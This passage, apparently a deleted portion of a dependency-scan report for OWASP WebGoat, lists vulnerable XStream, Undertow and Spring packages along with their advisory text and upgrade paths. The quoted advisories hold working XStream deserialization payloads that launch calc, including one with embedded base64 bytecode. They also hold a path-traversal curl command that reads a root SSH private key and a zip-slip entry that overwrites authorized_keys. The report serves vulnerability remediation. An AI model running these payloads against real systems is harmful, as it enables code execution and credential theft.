-                "outcome": "fully_resolved"
-              },
-              "id": "00000016-0000-4000-8000-000000000016",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker who has sufficient rights to execute local commands on the host only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'\u003e\r\n        \u003cindexMap class='com.sun.xml.internal.ws.client.ResponseContext'\u003e\r\n          \u003cpacket\u003e\r\n            \u003cmessage class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'\u003e\r\n              \u003cdataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'\u003e\r\n                \u003cbridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'\u003e\r\n                  \u003cbridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'\u003e\r\n                    \u003cbi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'\u003e\r\n                      \u003cjaxbType\u003ecom.sun.corba.se.impl.activation.ServerTableEntry\u003c/jaxbType\u003e\r\n                      \u003curiProperties/\u003e\r\n                      \u003cattributeProperties/\u003e\r\n                      \u003cinheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'\u003e\r\n                        \u003cgetter\u003e\r\n                          \u003cclass\u003ecom.sun.corba.se.impl.activation.ServerTableEntry\u003c/class\u003e\r\n                          \u003cname\u003everify\u003c/name\u003e\r\n                          \u003cparameter-types/\u003e\r\n                        \u003c/getter\u003e\r\n                      \u003c/inheritedAttWildcard\u003e\r\n                    \u003c/bi\u003e\r\n                    \u003ctagName/\u003e\r\n                    \u003ccontext\u003e\r\n                      \u003cmarshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'\u003e\r\n                        \u003couter-class reference='../..'/\u003e\r\n                      \u003c/marshallerPool\u003e\r\n                      \u003cnameList\u003e\r\n                        \u003cnsUriCannotBeDefaulted\u003e\r\n                          \u003cboolean\u003etrue\u003c/boolean\u003e\r\n                        \u003c/nsUriCannotBeDefaulted\u003e\r\n                        \u003cnamespaceURIs\u003e\r\n                          \u003cstring\u003e1\u003c/string\u003e\r\n                        \u003c/namespaceURIs\u003e\r\n                        \u003clocalNames\u003e\r\n                          \u003cstring\u003eUTF-8\u003c/string\u003e\r\n                        \u003c/localNames\u003e\r\n                      \u003c/nameList\u003e\r\n                    \u003c/context\u003e\r\n                  \u003c/bridge\u003e\r\n                \u003c/bridge\u003e\r\n                \u003cjaxbObject class='com.sun.corba.se.impl.activation.com.sun.corba.se.impl.activation.ServerTableEntry'\u003e\r\n                  \u003cactivationCmd\u003ecalc\u003c/activationCmd\u003e\r\n                \u003c/jaxbObject\u003e\r\n              \u003c/dataSource\u003e\r\n            \u003c/message\u003e\r\n            \u003csatellites/\u003e\r\n            \u003cinvocationProperties/\u003e\r\n          \u003c/packet\u003e\r\n        \u003c/indexMap\u003e\r\n      \u003c/comparator\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000017-0000-4000-8000-000000000017",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 334
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
-        },
-        "id": "00000017-0000-4000-8000-000000000017",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.16"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000017-0000-4000-8000-000000000017",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Directory Traversal due to improper input validation of the HTTP request. An attacker can access privileged or restricted files and directories by appending a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 .....           19           19  good.txt\n2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2259475)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000018-0000-4000-8000-000000000018",
-          "locations": [
-            {
-              "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 44
-            }
-          },
-          "title": "Directory Traversal"
-        },
-        "id": "00000018-0000-4000-8000-000000000018",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.1.9"
-                        },
-                        {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.12.Final"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000018-0000-4000-8000-000000000018",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003clinked-hash-set\u003e\r\n  \u003cdynamic-proxy\u003e\r\n    \u003cinterface\u003emap\u003c/interface\u003e\r\n    \u003chandler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'\u003e\r\n\t  \u003cclassToInvocationHandler class='linked-hash-map'/\u003e\r\n      \u003cdefaultHandler class='sun.tracing.NullProvider'\u003e\r\n        \u003cactive\u003etrue\u003c/active\u003e\r\n        \u003cproviderType\u003ejava.lang.Object\u003c/providerType\u003e\r\n        \u003cprobes\u003e\r\n          \u003centry\u003e\r\n            \u003cmethod\u003e\r\n              \u003cclass\u003ejava.lang.Object\u003c/class\u003e\r\n              \u003cname\u003ehashCode\u003c/name\u003e\r\n              \u003cparameter-types/\u003e\r\n            \u003c/method\u003e\r\n            \u003csun.tracing.dtrace.DTraceProbe\u003e\r\n              \u003cproxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'/\u003e\r\n                \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n                  \u003cdefault\u003e\r\n                    \u003c__name\u003ePwnr\u003c/__name\u003e\r\n                    \u003c__bytecodes\u003e\r\n                      \u003cbyte-array\u003eyv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=\u003c/byte-array\u003e\r\n                      \u003cbyte-array\u003eyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ\u003c/byte-array\u003e\r\n                    \u003c/__bytecodes\u003e\r\n                    \u003c__transletIndex\u003e-1\u003c/__transletIndex\u003e\r\n                    \u003c__indentNumber\u003e0\u003c/__indentNumber\u003e\r\n                  \u003c/default\u003e\r\n                \u003c/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n              \u003c/proxy\u003e\r\n              \u003cimplementing__method\u003e\r\n                \u003cclass\u003ecom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003c/class\u003e\r\n                \u003cname\u003egetOutputProperties\u003c/name\u003e\r\n                \u003cparameter-types/\u003e\r\n              \u003c/implementing__method\u003e\r\n            \u003c/sun.tracing.dtrace.DTraceProbe\u003e\r\n          \u003c/entry\u003e\r",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000019-0000-4000-8000-000000000019",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 275
-            }
-          },
-          "title": "Arbitrary Code Execution"
-        },
-        "id": "00000019-0000-4000-8000-000000000019",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000019-0000-4000-8000-000000000019",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an `xstream.fromXML(\"\u0026lt;void/\u003e\")` call.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.10 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7957)\n- [Vendor Advisory](http://x-stream.github.io/CVE-2017-7957.html)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000001a-0000-4000-8000-00000000001a",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 139
-            }
-          },
-          "title": "Denial of Service (DoS)"
-        },
-        "id": "0000001a-0000-4000-8000-00000000001a",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.10"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000001a-0000-4000-8000-00000000001a",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to `String.toLowerCase()` having some Locale dependent exceptions that could potentially result in fields not protected as expected.\r\n\r\n**Note:**\r\n\r\nThe fix for [CVE-2022-22968](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634) made `disallowedFields` patterns in `DataBinder` case insensitive.\r\n\r\nThis vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 6.1.14 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38820)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework:spring-webmvc",
-                  "version": "6.0.13"
-                },
-                {
-                  "name": "org.springframework:spring-context",
-                  "version": "6.0.13"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000001b-0000-4000-8000-00000000001b",
-          "locations": [
-            {
-              "package": {
-                "name": "org.springframework:spring-context",
-                "version": "6.0.13"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "low"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 31
-            }
-          },
-          "title": "Improper Handling of Case Sensitivity"
-        },
-        "id": "0000001b-0000-4000-8000-00000000001b",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-context",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.2.11"
-                        },
-                        {
-                          "name": "org.springframework:spring-webmvc",
-                          "version": "6.1.14"
-                        },
-                        {
-                          "name": "org.springframework:spring-context",
-                          "version": "6.1.14"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000001b-0000-4000-8000-00000000001b",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A remote attacker that has sufficient rights may execute commands of the host by only manipulating the processed input stream.\r\n\r\n### PoC\r\n```\r\n\u003c!-- Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream: --\u003e\r\n\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n      \u003ctype\u003e12345\u003c/type\u003e\r\n      \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n        \u003cm__obj class='string'\u003ecom.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: \u003cnone\u003e\u003c/m__obj\u003e\r\n      \u003c/value\u003e\r\n    \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n      \u003ctype\u003e12345\u003c/type\u003e\r\n      \u003cvalue class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'\u003e\r\n        \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n          \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n          \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n          \u003cbodyParts/\u003e\r\n          \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n            \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n            \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n              \u003csoapPart/\u003e\r\n              \u003cmm\u003e\r\n                \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                  \u003caliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'\u003e\r\n                    \u003ccandidates class='com.sun.jndi.rmi.registry.BindingEnumeration'\u003e\r\n                      \u003cnames\u003e\r\n                        \u003cstring\u003eaa\u003c/string\u003e\r\n                        \u003cstring\u003eaa\u003c/string\u003e\r\n                      \u003c/names\u003e\r\n                      \u003cctx\u003e\r\n                        \u003cenvironment/\u003e\r\n                        \u003cregistry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'\u003e\r\n                          \u003cjava.rmi.server.RemoteObject\u003e\r\n                            \u003cstring\u003eUnicastRef\u003c/string\u003e\r\n                            \u003cstring\u003eip2\u003c/string\u003e\r\n                            \u003cint\u003e1099\u003c/int\u003e\r\n                            \u003clong\u003e0\u003c/long\u003e\r\n                            \u003cint\u003e0\u003c/int\u003e\r\n                            \u003cshort\u003e0\u003c/short\u003e\r\n                            \u003cboolean\u003efalse\u003c/boolean\u003e\r\n                          \u003c/java.rmi.server.RemoteObject\u003e\r\n                        \u003c/registry\u003e\r\n                        \u003chost\u003eip2\u003c/host\u003e\r\n                        \u003cport\u003e1099\u003c/port\u003e\r\n                      \u003c/ctx\u003e\r\n                    \u003c/candidates\u003e\r\n                  \u003c/aliases\u003e\r\n                \u003c/it\u003e\r\n              \u003c/mm\u003e\r\n            \u003c/multiPart\u003e\r\n          \u003c/sm\u003e\r\n        \u003c/message\u003e\r\n      \u003c/value\u003e\r\n    \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  